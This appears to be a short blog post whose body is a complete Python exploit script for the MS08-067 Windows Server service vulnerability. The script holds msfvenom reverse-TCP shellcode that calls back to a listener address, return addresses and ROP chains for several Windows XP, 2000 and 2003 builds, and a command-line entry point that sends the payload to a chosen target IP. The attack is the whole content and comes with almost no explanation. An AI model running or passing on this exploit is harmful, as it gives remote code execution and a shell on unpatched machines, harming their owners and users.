python 在此处找到MS08-067 python脚本的修改版本：https：//github.com/ankh2054/python-exploits/blob/master/ms08_067.

Posted 2021-05-09

#!/usr/bin/env python
import struct
import time
import sys

from threading import Thread  # Thread is imported incase you would like to modify

try:
    from impacket import uuid
    from impacket.dcerpc.v5 import transport
except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
    sys.exit(1)

print '#######################################################################'
print '#  MS08-067 Exploit                                                   #'
print '#  This is a modified verion of Debasis Mohanty\'s code                #'
print '#    (https://www.exploit-db.com/exploits/7132/).                     #'
print '#  The return addresses and the ROP parts are ported from metasploit  #'
print '#    module exploit/windows/smb/ms08_067_netapi                       #'
print '#######################################################################\n'

# Shellcode - Standard Reverse TCP shellcode
# Badchars: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
# Payload size: 348 bytes + 62 NOPs (included)
# Make sure you set meterpreter EXITFUNC=thread  - Important!
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.95 LPORT=443 \
# EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -n 62
shellcode = (
    "\x49\x3f\xfd\xfc\xfc\x43\xfc\x90\xd6\xfc\x42\x43\x41\x3f\x43\x4a"
    "\xfd\xd6\x48\x92\x99\x42\x27\x41\xf8\xfc\x90\xf8\xf5\x91\x9f\xf9"
    "\x98\x37\x93\x41\x3f\xf5\x93\x98\xd6\x4b\x48\x3f\x27\x4a\x43\xf5"
    "\xfd\x43\xf9\x90\xf9\x98\x90\x4a\x92\x4a\x9f\xfc\x98\x92\x33\xc9"
    "\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x9c\x91\x96"
    "\xc3\x83\xee\xfc\xe2\xf4\x60\x79\x14\xc3\x9c\x91\xf6\x4a\x79\xa0"
    "\x56\xa7\x17\xc1\xa6\x48\xce\x9d\x1d\x91\x88\x1a\xe4\xeb\x93\x26"
    "\xdc\xe5\xad\x6e\x3a\xff\xfd\xed\x94\xef\xbc\x50\x59\xce\x9d\x56"
    "\x74\x31\xce\xc6\x1d\x91\x8c\x1a\xdc\xff\x17\xdd\x87\xbb\x7f\xd9"
    "\x97\x12\xcd\x1a\xcf\xe3\x9d\x42\x1d\x8a\x84\x72\xac\x8a\x17\xa5"
    "\x1d\xc2\x4a\xa0\x69\x6f\x5d\x5e\x9b\xc2\x5b\xa9\x76\xb6\x6a\x92"
    "\xeb\x3b\xa7\xec\xb2\xb6\x78\xc9\x1d\x9b\xb8\x90\x45\xa5\x17\x9d"
    "\xdd\x48\xc4\x8d\x97\x10\x17\x95\x1d\xc2\x4c\x18\xd2\xe7\xb8\xca"
    "\xcd\xa2\xc5\xcb\xc7\x3c\x7c\xce\xc9\x99\x17\x83\x7d\x4e\xc1\xf9"
    "\xa5\xf1\x9c\x91\xfe\xb4\xef\xa3\xc9\x97\xf4\xdd\xe1\xe5\x9b\x6e"
    "\x43\x7b\x0c\x90\x96\xc3\xb5\x55\xc2\x93\xf4\xb8\x16\xa8\x9c\x6e"
    "\x43\x93\xcc\xc1\xc6\x83\xcc\xd1\xc6\xab\x76\x9e\x49\x23\x63\x44"
    "\x01\xa9\x99\xf9\x9c\xc8\x9c\xce\xfe\xc1\x9c\x90\x2d\x4a\x7a\xfb"
    "\x86\x95\xcb\xf9\x0f\x66\xe8\xf0\x69\x16\x19\x51\xe2\xcf\x63\xdf"
    "\x9e\xb6\x70\xf9\x66\x76\x3e\xc7\x69\x16\xf4\xf2\xfb\xa7\x9c\x18"
    "\x75\x94\xcb\xc6\xa7\x35\xf6\x83\xcf\x95\x7e\x6c\xf0\x04\xd8\xb5"
    "\xaa\xc2\x9d\x1c\xd2\xe7\x8c\x57\x96\x87\xc8\xc1\xc0\x95\xca\xd7"
    "\xc0\x8d\xca\xc7\xc5\x95\xf4\xe8\x5a\xfc\x1a\x6e\x43\x4a\x7c\xdf"
    "\xc0\x85\x63\xa1\xfe\xcb\x1b\x8c\xf6\x3c\x49\x2a\x76\xde\xb6\x9b"
    "\xfe\x65\x09\x2c\x0b\x3c\x49\xad\x90\xbf\x96\x11\x6d\x23\xe9\x94"
    "\x2d\x84\x8f\xe3\xf9\xa9\x9c\xc2\x69\x16"
)

nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \
    "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10
disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \
    28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62"
ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01"
module_base = 0x6f880000


def generate_rop(rvas):
    gadget1 = "\x90\x5a\x59\xc3"
    gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
    gadget3 = "\xcc\x90\xeb\x5a"
    ret = struct.pack('<L', 0x00018000)
    ret += struct.pack('<L', rvas['call_HeapCreate'] + module_base)
    ret += struct.pack('<L', 0x01040110)
    ret += struct.pack('<L', 0x01010101)
    ret += struct.pack('<L', 0x01010101)
    ret += struct.pack('<L',
                       rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret'] + module_base)
    ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
    ret += gadget1
    ret += struct.pack('<L', rvas['mov [eax], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['jmp eax'] + module_base)
    ret += gadget2[0]
    ret += gadget2[1]
    ret += struct.pack('<L', rvas[
        'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
    ret += gadget2[2]
    ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['add eax, 8 / ret'] + module_base)
    ret += struct.pack('<L', rvas['jmp eax'] + module_base)
    ret += gadget3
    return ret


class SRVSVC_Exploit(Thread):
    def __init__(self, target, os, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__trans = None
        self.__dce = None
        self.__stub = None
        self.__port = port
        self.__target = target
        self.__os = os

    def __DCEPacket(self):
        if self.__os == '1':
            print 'Windows XP SP0/SP1 Universal\n'
            ret = "\x61\x13\x00\x01"
            jumper = nonxjmper % (ret, ret)
        elif self.__os == '2':
            print 'Windows 2000 Universal\n'
            ret = "\xb0\x1c\x1f\x00"
            jumper = nonxjmper % (ret, ret)
        elif self.__os == '3':
            print 'Windows 2003 SP0 Universal\n'
            ret = "\x9e\x12\x00\x01"  # 0x01 00 12 9e
            jumper = nonxjmper % (ret, ret)
        elif self.__os == '4':
            print 'Windows 2003 SP1 English\n'
            ret_dec = "\x8c\x56\x90\x7c"  # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
            ret_pop = "\xf4\x7c\xa2\x7c"  # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
            jmp_esp = "\xd3\xfe\x86\x7c"  # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
            disable_nx = "\x13\xe4\x83\x7c"  # 0x 7c 83 e4 13 NX disable @NTDLL.DLL
            jumper = disableNXjumper % (
                ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2)
        elif self.__os == '5':
            print 'Windows XP SP3 French (NX)\n'
            ret = "\x07\xf8\x5b\x59"  # 0x59 5b f8 07
            disable_nx = "\xc2\x17\x5c\x59"  # 0x59 5c 17 c2
            # the nonxjmper also work in this case.
            jumper = nonxjmper % (disable_nx, ret)
        elif self.__os == '6':
            print 'Windows XP SP3 English (NX)\n'
            ret = "\x07\xf8\x88\x6f"  # 0x6f 88 f8 07
            disable_nx = "\xc2\x17\x89\x6f"  # 0x6f 89 17 c2
            # the nonxjmper also work in this case.
            jumper = nonxjmper % (disable_nx, ret)
        elif self.__os == '7':
            print 'Windows XP SP3 English (AlwaysOn NX)\n'
            rvasets = {'call_HeapCreate': 0x21286,
                       'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796,
                       'pop ecx / ret': 0x2e796 + 6,
                       'mov [eax], ecx / ret': 0xd296,
                       'jmp eax': 0x19c6f,
                       'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56,
                       'mov [eax+0x10], ecx / ret': 0x10a56 + 6,
                       'add eax, 8 / ret': 0x29c64}
            # the nonxjmper also work in this case.
            jumper = generate_rop(rvasets) + "AB"
        else:
            print 'Not supported OS version\n'
            sys.exit(-1)

        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory(
            'ncacn_np:%s[\\pipe\\browser]' % self.__target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.__target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(
            ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

        # Change shellcode to your required shellcode
        path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode + \
            "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \
            "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
        server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" + \
            "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
        prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
        self.__stub = server + "\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + \
            path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00"
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        time.sleep(5)
        print 'Exploit finish\n'


def main():
    try:
        target = sys.argv[1]
        os = sys.argv[2]
    except IndexError:
        print 'Usage: %s <target ip>\n' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 1\' for Windows XP SP0/SP1 Universal' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 2\' for Windows 2000 Universal' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 3\' for Windows 2003 SP0 Universal' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 4\' for Windows 2003 SP1 English' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 5\' for Windows XP SP3 French (NX)' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 6\' for Windows XP SP3 English (NX)' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 7\' for Windows XP SP3 English (AlwaysOn NX)' % sys.argv[0]
        sys.exit(-1)

    current = SRVSVC_Exploit(target, os)
    current.start()


if __name__ == '__main__':
    main()